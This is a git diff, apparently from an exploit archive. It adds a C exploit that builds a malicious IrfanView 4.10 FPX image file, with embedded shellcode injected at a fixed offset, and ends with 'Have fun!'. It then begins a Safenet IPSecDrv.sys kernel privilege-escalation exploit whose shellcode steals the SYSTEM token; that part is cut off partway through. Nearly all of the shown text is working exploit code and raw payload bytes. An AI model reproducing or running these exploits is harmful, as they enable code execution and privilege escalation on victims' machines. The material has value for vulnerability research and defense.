+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf9\xf9" +"\xf9\xf2\xf3\xf3\xed\xee\xee\xdb\xdc\xdc\xe3\xe3\xe3\xda\xdb\xdb" +"\xe5\xe5\xe5\xf0\xf0\xf0\xee\xee\xee\xda\xda\xda\xed\xed\xed\xfc" 
+"\xfc\xfc\xd8\xd8\xd8\xf8\xf8\xf8\xec\xec\xed\xe9\xe9\xe9\xde\xde" +"\xde\xe1\xe1\xe2\xdd\xde\xde\xcf\xd0\xd0\xfa\xfa\xfa\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xed\xed" +"\xed\xd8\xd9\xda\xd2\xd3\xd4\xb0\xb1\xb2\xb5\xb6\xb6\xd1\xd2\xd2" +"\xb4\xb4\xb3\xd1\xd1\xd0\xc9\xc9\xc9\xad\xad\xad\xcc\xcd\xcd\xf5" +"\xf5\xf5\xbf\xbf\xbf\xdf\xdf\xde\x9d\x9d\x9d\xb6\xb7\xb7\xc6\xc7" +"\xc7\xc6\xc7\xc7\xcc\xcc\xcc\xc9\xc9\xca\xf3\xf3\xf3\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfa\xfa" +"\xfa\xea\xea\xea\xe9\xe9\xe9\xe5\xe5\xe5\xec\xec\xec\xe0\xe1\xe1" +"\xdb\xdb\xdb\xe0\xe1\xe0\xe8\xe8\xe8\xe1\xe1\xe1\xf1\xf1\xf1\xfd" +"\xfd\xfd\xd5\xd5\xd5\xec\xec\xec\xf4\xf4\xf4\xf1\xf1\xf1\xe4\xe4" +"\xe4\xe7\xe7\xe6\xc8\xc9\xc9\xd7\xd7\xd7\xf9\xf9\xf9\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xf7\xf7\xf7\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xfe" +"\xfe\xfe\xf7\xf7\xf7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xf5\xf5\xf5\xf7\xf7\xf7\xfe\xfe\xfe\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xfc\xfc\xfc\xfb\xfb\xfb\xfc\xfc\xfc\xf8\xf8" +"\xf8\xf1\xf1\xf1\xf4\xf4\xf4\xf3\xf4\xf4\xf8\xf8\xf8\xfa\xfa\xfa" +"\xf5\xf5\xf5\xf5\xf5\xf5\xf7\xf7\xf7\xf7\xf7\xf7\xf5\xf5\xf5\xf5" +"\xf5\xf5\xfb\xfb\xfb\xff\xff\xff\xfe\xfe\xfe\xf5\xf5\xf5\xf6\xf6" 
+"\xf7\xfd\xfd\xfd\xf2\xf2\xf2\xf9\xf9\xf9\xfb\xfb\xfb\xf7\xf7\xf7" +"\xf3\xf3\xf3\xfb\xfc\xfc\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xf2\xf2\xf2\xd7\xd7\xd7\xd7\xd7\xd7\xcf\xcf" +"\xcf\xc7\xc8\xc7\xcc\xcd\xcd\xca\xca\xcb\xca\xca\xca\xd3\xd3\xd4" +"\xcc\xcd\xcd\xc7\xc8\xc8\xc4\xc5\xc5\xd4\xd5\xd5\xc4\xc4\xc4\xc7" +"\xc8\xc7\xdb\xdc\xdb\xbe\xbf\xbf\xba\xbb\xbc\xc2\xc3\xc4\xd0\xd1" +"\xd2\xef\xef\xef\xc6\xc6\xc6\xcc\xcd\xcd\xdb\xdb\xdc\xc9\xca\xc9" +"\xc6\xc6\xc6\xe7\xe7\xe7\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xf7\xf7\xf7\xbf\xbf\xc0\xa4\xa5\xa6\xb0\xb1" +"\xb0\xbd\xbe\xbd\xc3\xc4\xc5\xc1\xc2\xc2\xaf\xaf\xb0\xb2\xb3\xb4" +"\xb4\xb5\xb6\xb4\xb5\xb5\xb7\xb7\xb7\xca\xcb\xcc\xac\xae\xad\xae" +"\xb0\xaf\xbe\xbe\xbe\x94\x95\x94\xe5\xe5\xe6\xaa\xab\xab\xba\xbb" +"\xbc\xe4\xe4\xe5\xd3\xd4\xd4\xb3\xb3\xb3\xb0\xb0\xb0\xb9\xba\xba" +"\xc0\xc1\xc2\xe7\xe7\xe8\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xfe\xfe\xfe\xfd\xfd\xfd\xfc\xfc" +"\xfc\xfb\xfb\xfb\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xf4\xf4\xf4\xfd\xfd\xfd\xfd\xfd\xfd\xfa\xfa\xfa" +"\xf2\xf2\xf2\xfe\xfe\xfe\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" 
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
+"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x03\x00\x01\x00\x03\x00"
+"\x02\x00\x03\x00\x13\x10\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00"
+"\x03\x00\x00\x00\x04\x00\x00\x00";
+
+
+
+int main(int argc, char* argv[])
+{
+ FILE* fpxfile;
+ char evilbuff[110000];
+ int offset=0;
+
+ printf("[+] Irfanview 4.10 .FPX File Memory Corruption\n");
+ printf("[+] Coded and discovered by Marsu \n");
+ if (argc!=2) {
+ printf("[+] Usage: %s \n",argv[0]);
+ return 0;
+ }
+
+ memset(evilbuff,0,110000);
+ memcpy(evilbuff,FPX_file1,sizeof(FPX_file1)-1);
+ offset=sizeof(FPX_file1)-1;
+ memcpy(evilbuff+offset,FPX_file2,sizeof(FPX_file2)-1);
+ offset+=sizeof(FPX_file2)-1;
+ memcpy(evilbuff+offset,FPX_file3,sizeof(FPX_file3)-1);
+ offset+=sizeof(FPX_file3)-1;
+ memcpy(evilbuff+offset,FPX_file4,sizeof(FPX_file4)-1);
+ offset+=sizeof(FPX_file4)-1;
+ memcpy(evilbuff+offset,FPX_file5,sizeof(FPX_file5)-1);
+ offset+=sizeof(FPX_file5)-1;
+ memcpy(evilbuff+offset,FPX_file6,sizeof(FPX_file6)-1);
+ offset+=sizeof(FPX_file6)-1;
+ memcpy(evilbuff+offset,FPX_file7,sizeof(FPX_file7)-1);
+ offset+=sizeof(FPX_file7)-1;
+ memcpy(evilbuff+offset,FPX_file8,sizeof(FPX_file8)-1);
+ offset+=sizeof(FPX_file8)-1;
+
+ memcpy(evilbuff+0x5c3a,"\x90\xeb\x07\xcc\x56\x7B\x01\x10\x41\x41\x41\x41",12); //change this to debug
+ memcpy(evilbuff+0x5c3a+12,CalcShellcode,sizeof(CalcShellcode)-1);
+
+ printf("[+] FPX file patched!\n");
+
+ if ((fpxfile=fopen(argv[1],"wb"))==0) {
+ printf("[-] Unable to access file.\n");
+ return 0;
+ }
+
+ fwrite( evilbuff, 1, 102952, fpxfile );
+ fclose(fpxfile);
+ printf("[+] Done. Have fun!\n");
+ return 0;
+}
+
+// milw0rm.com [2008-01-28]
diff --git a/platforms/windows/local/5004.c b/platforms/windows/local/5004.c
index 20f8cfc9f..1bcf9a1fd 100755
--- a/platforms/windows/local/5004.c
+++ b/platforms/windows/local/5004.c
@@ -1,277 +1,277 @@ -/* safenet-ipsec-call.c - * - * Copyright (c) 2008 by - * - * Safenet IPSecDrv.sys <= 10.4.0.12 local kernel ring0 indirect call SYSTEM exploit - * by mu-b - Thu 03 Jan 2008 - * - * - Tested on: IPSecDrv.sys 10.4.0.12 - * bundle with: SafeNET HighAssurance Remote, SoftRemote - * - Microsoft Windows 2003 SP2 - * - * user definable offset used in an indirect call. - * - * .text:10009970 000 mov eax, [esp+arg_0] - * .text:10009974 000 mov ecx, [esp+arg_4] - * .text:10009978 000 shl eax, 4 - * .text:1000997B 000 push ecx - * .text:1000997C 004 call off_1001C604[eax] - * - * Note: this can be made universal for all array offsets, - * relatively easily since we control the offset and therefore - * the memory address.. - * IPSecDrv.sys 10.4.0.12 - 0x1C604 - * 10.3.5.6 - 0x1B604 - * - * Compile: MinGW + -lntdll - * - * - Private Source Code -DO NOT DISTRIBUTE - - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! - */ - -#include -#include - -#include -#include - -#define IPSECDRV_IOCTL 0x80002064 - -#define ARG_SIZE(a) ((a)/sizeof (void *)) - -static unsigned char win32_fixup[] = - "\x53" - "\x52"; - -static unsigned char win2k3_ring0_shell[] = - /* _ring0 */ - "\xb8\x24\xf1\xdf\xff" - "\x8b\x00" - "\x8b\xb0\x18\x02\x00\x00" - "\x89\xf0" - /* _sys_eprocess_loop */ - "\x8b\x98\x94\x00\x00\x00" - "\x81\xfb\x04\x00\x00\x00" - "\x74\x11" - "\x8b\x80\x9c\x00\x00\x00" - "\x2d\x98\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - "\xeb\x21" - /* _sys_eprocess_found */ - "\x89\xc1" - "\x89\xf0" - - /* _cmd_eprocess_loop */ - "\x8b\x98\x94\x00\x00\x00" - "\x81\xfb\x00\x00\x00\x00" - "\x74\x10" - "\x8b\x80\x9c\x00\x00\x00" - "\x2d\x98\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - /* _not_found */ - "\xcc" - /* _cmd_eprocess_found - * _ring0_end */ - - /* copy tokens!$%! 
*/ - "\x8b\x89\xd8\x00\x00\x00" - "\x89\x88\xd8\x00\x00\x00" - "\x90"; - -static unsigned char winxp_ring0_shell[] = - /* _ring0 */ - "\xb8\x24\xf1\xdf\xff" - "\x8b\x00" - "\x8b\x70\x44" - "\x89\xf0" - /* _sys_eprocess_loop */ - "\x8b\x98\x84\x00\x00\x00" - "\x81\xfb\x04\x00\x00\x00" - "\x74\x11" - "\x8b\x80\x8c\x00\x00\x00" - "\x2d\x88\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - "\xeb\x21" - /* _sys_eprocess_found */ - "\x89\xc1" - "\x89\xf0" - - /* _cmd_eprocess_loop */ - "\x8b\x98\x84\x00\x00\x00" - "\x81\xfb\x00\x00\x00\x00" - "\x74\x10" - "\x8b\x80\x8c\x00\x00\x00" - "\x2d\x88\x00\x00\x00" - "\x39\xf0" - "\x75\xe3" - /* _not_found */ - "\xcc" - /* _cmd_eprocess_found - * _ring0_end */ - - /* copy tokens!$%! */ - "\x8b\x89\xc8\x00\x00\x00" - "\x89\x88\xc8\x00\x00\x00" - "\x90"; - -static unsigned char win32_ret[] = - "\x5a" - "\x5b" - "\xc2\x04\x00"; - -struct ioctl_req { - void *arg[ARG_SIZE(0x4C)]; -}; - -static PCHAR -fixup_ring0_shell (PVOID base, DWORD ppid, DWORD *zlen) -{ - DWORD dwVersion, dwMajorVersion, dwMinorVersion; - - dwVersion = GetVersion (); - dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion))); - dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion))); - - if (dwMajorVersion != 5) - { - fprintf (stderr, "* 